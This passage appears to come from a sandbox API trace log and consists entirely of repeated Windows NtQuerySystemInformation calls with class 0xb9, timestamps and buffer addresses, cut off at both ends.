Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce80, Length=0x28, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x20, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0206.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce80, Length=0x28, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x20, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x20, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0206.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x50, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd210, Length=0x50, ResultLength=0x0) [0206.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, 